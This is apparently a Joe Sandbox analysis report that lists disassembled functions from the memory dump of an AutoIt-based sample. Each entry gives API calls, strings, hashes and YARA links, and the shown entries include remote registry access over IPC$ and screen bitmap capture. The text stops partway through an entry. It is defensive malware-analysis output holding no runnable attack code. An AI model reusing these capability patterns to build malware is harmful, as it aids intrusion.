API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: c9e9578a2b4cdb3bbafcd696a01ef36e35489f99e76b21ec7cdeb15dc112d1a8
Instruction ID: 7c39d788b2d1416e11a1adcb20f73080c76f10b498d087950928605ae08c2d68
Opcode Fuzzy Hash: c9e9578a2b4cdb3bbafcd696a01ef36e35489f99e76b21ec7cdeb15dc112d1a8
Instruction Fuzzy Hash: B1414F72900219EACF05FBE0DD4AEEEB778EF19340F104469F509B2091EA796F49CB60

Function 007FBA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 007FBA56
GetFileSize.KERNEL32(00000000,00000000), ref: 007FBA6D
GlobalAlloc.KERNEL32(00000002,00000000), ref: 007FBA78
CloseHandle.KERNEL32(00000000), ref: 007FBA85
GlobalLock.KERNEL32(00000000), ref: 007FBA8E
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 007FBA9D
GlobalUnlock.KERNEL32(00000000), ref: 007FBAA6
CloseHandle.KERNEL32(00000000), ref: 007FBAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 007FBABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00802CAC,?), ref: 007FBAD7
GlobalFree.KERNEL32(00000000), ref: 007FBAE7
GetObjectW.GDI32(?,00000018,000000FF), ref: 007FBB0B
CopyImage.USER32(?,00000000,?,?,00002000), ref: 007FBB36
DeleteObject.GDI32(00000000), ref: 007FBB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007FBB74

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 989c8d36cd2ad1f14cb8488411a8505e31f212b0caf927f1aeae092c8e0b4d6d
Instruction ID: 68617a63550ed542b99ef61adba6ba6ce527f244da79641989de826c7aacdd21
Opcode Fuzzy Hash: 989c8d36cd2ad1f14cb8488411a8505e31f212b0caf927f1aeae092c8e0b4d6d
Instruction Fuzzy Hash: B6411575600209EFDB119F65DC88EBEBBB9FF89711F108069FA05D7260DB389A01CB64

Function 007DD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 007DDA10
_wcscat.LIBCMT ref: 007DDA28
_wcscat.LIBCMT ref: 007DDA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007DDA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 007DDA63
GetFileAttributesW.KERNEL32(?), ref: 007DDA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 007DDA95
SetCurrentDirectoryW.KERNEL32(?), ref: 007DDAA7

Strings

*.*, xrefs: 007DDAE6

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 8a6800624f1600654a038edb214ba0728c33d832b5f51e1749fadf29a6d70dbd
Instruction ID: 2d7ade06e5adf484c538271bf605869f34bfb9e75e5dc1b2e9800f63bd8f042d
Opcode Fuzzy Hash: 8a6800624f1600654a038edb214ba0728c33d832b5f51e1749fadf29a6d70dbd
Instruction Fuzzy Hash: 23816EB15042419FCB34EF64C8549AAB7F8EF89354F14882BF889C7351EA39ED45CB52

Function 007FC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007FC1FC
GetFocus.USER32 ref: 007FC20C
GetDlgCtrlID.USER32(00000000), ref: 007FC217
_memset.LIBCMT ref: 007FC342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007FC36D
GetMenuItemCount.USER32(?), ref: 007FC38D
GetMenuItemID.USER32(?,00000000), ref: 007FC3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007FC3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007FC41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007FC454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007FC489

Strings

0, xrefs: 007FC33A

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 4f5a4e53d04296373bf01d636af8b3de38e2459fcad0687347224619b0b8e49b
Instruction ID: 8d970bee0316badd48a11e420292da8d00f10ebda9a0b7341957409ccf731131
Opcode Fuzzy Hash: 4f5a4e53d04296373bf01d636af8b3de38e2459fcad0687347224619b0b8e49b
Instruction Fuzzy Hash: AB816D706083499FDB11CF14C994A7ABBE8FF88754F00492EFA9597391C738D905DBA2

Function 007E731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007E738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007E739B
CreateCompatibleDC.GDI32(?), ref: 007E73A7
SelectObject.GDI32(00000000,?), ref: 007E73B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007E7408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007E7444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007E7468
SelectObject.GDI32(00000006,?), ref: 007E7470
DeleteObject.GDI32(?), ref: 007E7479
DeleteDC.GDI32(00000006), ref: 007E7480
ReleaseDC.USER32(00000000,?), ref: 007E748B

Strings

(, xrefs: 007E7410

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 7ac7a260800e75401a6234958fa9e1692f3de7f21d046a46d1efde0a52de806c
Instruction ID: 564ce4939822c0db71707ed44f7da183a6bab35c836bea506eda4e24610bfd5a
Opcode Fuzzy Hash: 7ac7a260800e75401a6234958fa9e1692f3de7f21d046a46d1efde0a52de806c
Instruction Fuzzy Hash: DF517B71904349EFCB14CFA9CC88EAEBBB9EF48310F14842DF95997210CB35A840CB54

Function 00776A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00790957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00776B0C,?,00008000), ref: 00790973

Part of subcall function 00774750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00774743,?,?,007737AE,?), ref: 00774770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00776BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00776CFA

Part of subcall function 0077586D: _wcscpy.LIBCMT ref: 007758A5

Part of subcall function 0079363D: _iswctype.LIBCMT ref: 00793645

Strings

Error opening the file, xrefs: 007AE43D, 007AE4B8
Bad directive syntax error, xrefs: 007AE79D
#include depth exceeded. Make sure there are no recursive includes, xrefs: 007AE421
Unterminated string, xrefs: 007AE7E4
EA06, xrefs: 007AE452
AU3!, xrefs: 00776B61
>>>AUTOIT SCRIPT<<<, xrefs: 007AE496

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: bd3ac899614c4ee785a691a2fa49cb4ebf47f8648f13e10081685154298591b7
Instruction ID: 28567123bf7dba16227e455c414219c4c876d609b2a787d4768de5bf2d99edcc
Opcode Fuzzy Hash: bd3ac899614c4ee785a691a2fa49cb4ebf47f8648f13e10081685154298591b7
Instruction Fuzzy Hash: 4C02AC30108341DFCB24EF24C885AAFBBE5EF99354F10891DF499972A1DB78E949CB52

Function 007D2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D2D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 007D2DDD
GetMenuItemCount.USER32(00835890), ref: 007D2E66
DeleteMenu.USER32(00835890,00000005,00000000,000000F5,?,?), ref: 007D2EF6
DeleteMenu.USER32(00835890,00000004,00000000), ref: 007D2EFE
DeleteMenu.USER32(00835890,00000006,00000000), ref: 007D2F06
DeleteMenu.USER32(00835890,00000003,00000000), ref: 007D2F0E
GetMenuItemCount.USER32(00835890), ref: 007D2F16
SetMenuItemInfoW.USER32(00835890,00000004,00000000,00000030), ref: 007D2F4C
GetCursorPos.USER32(?), ref: 007D2F56
SetForegroundWindow.USER32(00000000), ref: 007D2F5F
TrackPopupMenuEx.USER32(00835890,00000000,?,00000000,00000000,00000000), ref: 007D2F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007D2F7E

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 833ef1cfd704524973d1985790540867526ec950bcd4c67eedaff3a82743bbff
Instruction ID: 3ea389fd88e2376e195c9dbb40c836946b780adc43ebe83a5e1041c39781bfe5
Opcode Fuzzy Hash: 833ef1cfd704524973d1985790540867526ec950bcd4c67eedaff3a82743bbff
Instruction Fuzzy Hash: A971D570601205BEEB218F54DC49FAABF75FF14364F104217F625A63E2CB796822D7A4

Function 007C77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00777BCC: _memmove.LIBCMT ref: 00777C06

_memset.LIBCMT ref: 007C786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007C78A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007C78BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007C78D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007C7902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 007C792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C7935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C793A

Strings

\CLSID, xrefs: 007C7822
SOFTWARE\Classes\, xrefs: 007C780C
\IPC$, xrefs: 007C7882

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 01338937639b23809f40e13ade41e088b20f96526335ddee94211f317505bdd7
Instruction ID: bfe45a91d71025e4eee047b7a48a053d09d66020ec71da7dfc9b2124452b07c0
Opcode Fuzzy Hash: 01338937639b23809f40e13ade41e088b20f96526335ddee94211f317505bdd7
Instruction Fuzzy Hash: 6C41F872C14629EBDF15EBA4DC89DEDB7B8FF04350F408469E919A3261EA785D04CF90

Function 007F0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EFDAD,?,?), ref: 007F0E31

Strings

HKCU, xrefs: 007F0F21
HKLM, xrefs: 007F0EAF
HKEY_CURRENT_CONFIG, xrefs: 007F0EEE
HKCC, xrefs: 007F0EFF
HKEY_CURRENT_USER, xrefs: 007F0F10
HKEY_CLASSES_ROOT, xrefs: 007F0EC4
HKEY_USERS, xrefs: 007F0F32
HKCR, xrefs: 007F0ED9
HKU, xrefs: 007F0F43
HKEY_LOCAL_MACHINE, xrefs: 007F0E9A

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 7f77402577da17a9cf13d41fab54c958f9e76eb7ab80938db9eca307d3eea37d
Instruction ID: 674db94e9d5c1344b37cf3f742b8f33e59afce183fe9c18c2785c5b4bb1a1572
Opcode Fuzzy Hash: 7f77402577da17a9cf13d41fab54c958f9e76eb7ab80938db9eca307d3eea37d
Instruction Fuzzy Hash: AA41253111025ACBCF10EE50E859AFE37A4FF11344F548454FE955B392DB38A95ACBE0

Function 007CF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007AE2A0,00000010,?,Bad directive syntax error,007FF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 007CF7C2
LoadStringW.USER32(00000000,?,007AE2A0,00000010), ref: 007CF7C9

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

_wprintf.LIBCMT ref: 007CF7FC
__swprintf.LIBCMT ref: 007CF81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007CF88D

Strings

Error: , xrefs: 007CF85B
%s (%d) : ==> %s.: %s %s, xrefs: 007CF7F7
., xrefs: 007CF873
Line %d (File "%s"):, xrefs: 007CF833
Line %d:, xrefs: 007CF818

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 027dddb01e52d976cf57aabd8dce64d8df656984f9f648629cddec22ce2d8655
Instruction ID: f546852e9265fe488edac6da549e9e0086cc9dd3e7f7f6040e762bd0f81893f8
Opcode Fuzzy Hash: 027dddb01e52d976cf57aabd8dce64d8df656984f9f648629cddec22ce2d8655
Instruction Fuzzy Hash: CC21513190021EEBCF16EF90DC4AEFE7779FF18300F044869F519661A1EA79A658DB50

Function 007D52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00777BCC: _memmove.LIBCMT ref: 00777C06

Part of subcall function 00777924: _memmove.LIBCMT ref: 007779AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007D5330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007D5346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007D5357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007D5369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007D537A

Strings

play PlayMe wait, xrefs: 007D5364
close PlayMe, xrefs: 007D5341, 007D536E
play PlayMe, xrefs: 007D5375
status PlayMe mode, xrefs: 007D532B
alias PlayMe, xrefs: 007D5309
open , xrefs: 007D52DF

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 1b9e58134f0c31b6e8fa54c1556e14f4a240b609931a3d9b5c2adf85e37cb47b
Instruction ID: 38ad3c23f0e375515132404b4789df6558c872438feee55ff99c04de9c4ba3e8
Opcode Fuzzy Hash: 1b9e58134f0c31b6e8fa54c1556e14f4a240b609931a3d9b5c2adf85e37cb47b
Instruction Fuzzy Hash: E511E620951229BADF24B761DC4DDFF7BBCFB92B84F00442AB415D21D0DEA81C44C970

Function 007D46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 007D46D2
gethostname.WSOCK32(?,00000100), ref: 007D46EC
gethostbyname.WSOCK32(?), ref: 007D46F9
_wcscpy.LIBCMT ref: 007D4721
_memmove.LIBCMT ref: 007D4734
inet_ntoa.WSOCK32(?), ref: 007D473F
_strcat.LIBCMT ref: 007D474D
_wcscpy.LIBCMT ref: 007D4764
WSACleanup.WSOCK32 ref: 007D4772
_wcscpy.LIBCMT ref: 007D4780

Strings

0.0.0.0, xrefs: 007D471B

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 2fe4e98484f780fc0aa2af35c36f8421c41b96ef5c1712082ea4772e59d2ef8e
Instruction ID: 3416029413b86ef3ec18210049c3782d71a6bdba042070985204037deebed5ea
Opcode Fuzzy Hash: 2fe4e98484f780fc0aa2af35c36f8421c41b96ef5c1712082ea4772e59d2ef8e
Instruction Fuzzy Hash: 5711C031900114BFCF20BB30EC4AEEA77BCEF02721F0441BAF44596291EF789A81CA65

Function 007D4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 007D4F7A

Part of subcall function 0079049F: timeGetTime.WINMM(?,75C0B400,00780E7B), ref: 007904A3

Sleep.KERNEL32(0000000A), ref: 007D4FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 007D4FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007D4FEC
SetActiveWindow.USER32 ref: 007D500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007D5019
SendMessageW.USER32(00000010,00000000,00000000), ref: 007D5038
Sleep.KERNEL32(000000FA), ref: 007D5043
IsWindow.USER32 ref: 007D504F
EndDialog.USER32(00000000), ref: 007D5060

Strings

BUTTON, xrefs: 007D4FDE

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: f05847783bf27b4faf747f54b59076d915926a5bf4908d6374f053d0c86c1893
Instruction ID: 58bd874db67609d8871f7eff048818be04e570bcb454262f570032bb9deec2fd
Opcode Fuzzy Hash: f05847783bf27b4faf747f54b59076d915926a5bf4908d6374f053d0c86c1893
Instruction Fuzzy Hash: 38214971205605BFEB105F34EC89A363B79FB85746B089835F511822B1EF798D60CA76

Function 007DD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00779837: __itow.LIBCMT ref: 00779862
Part of subcall function 00779837: __swprintf.LIBCMT ref: 007798AC

CoInitialize.OLE32(00000000), ref: 007DD5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007DD67D
SHGetDesktopFolder.SHELL32(?), ref: 007DD691
CoCreateInstance.OLE32(00802D7C,00000000,00000001,00828C1C,?), ref: 007DD6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007DD74C
CoTaskMemFree.OLE32(?,?), ref: 007DD7A4
_memset.LIBCMT ref: 007DD7E1
SHBrowseForFolderW.SHELL32(?), ref: 007DD81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007DD840
CoTaskMemFree.OLE32(00000000), ref: 007DD847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007DD87E
CoUninitialize.OLE32(00000001,00000000), ref: 007DD880

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: ff1597633340088a13f8b736580a04708baf325dc7d7f64149c98f67f3c653f1
Instruction ID: 36cece88c59d97a817961cdff6e513cefcda173b8aa4258cb5bab477628f2cd2
Opcode Fuzzy Hash: ff1597633340088a13f8b736580a04708baf325dc7d7f64149c98f67f3c653f1
Instruction Fuzzy Hash: 7DB1E775A00109EFDB14DFA4C888DAEBBB9FF48354B1484A9E909EB361DB34ED45CB50

Function 007CC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 007CC283
GetWindowRect.USER32(00000000,?), ref: 007CC295
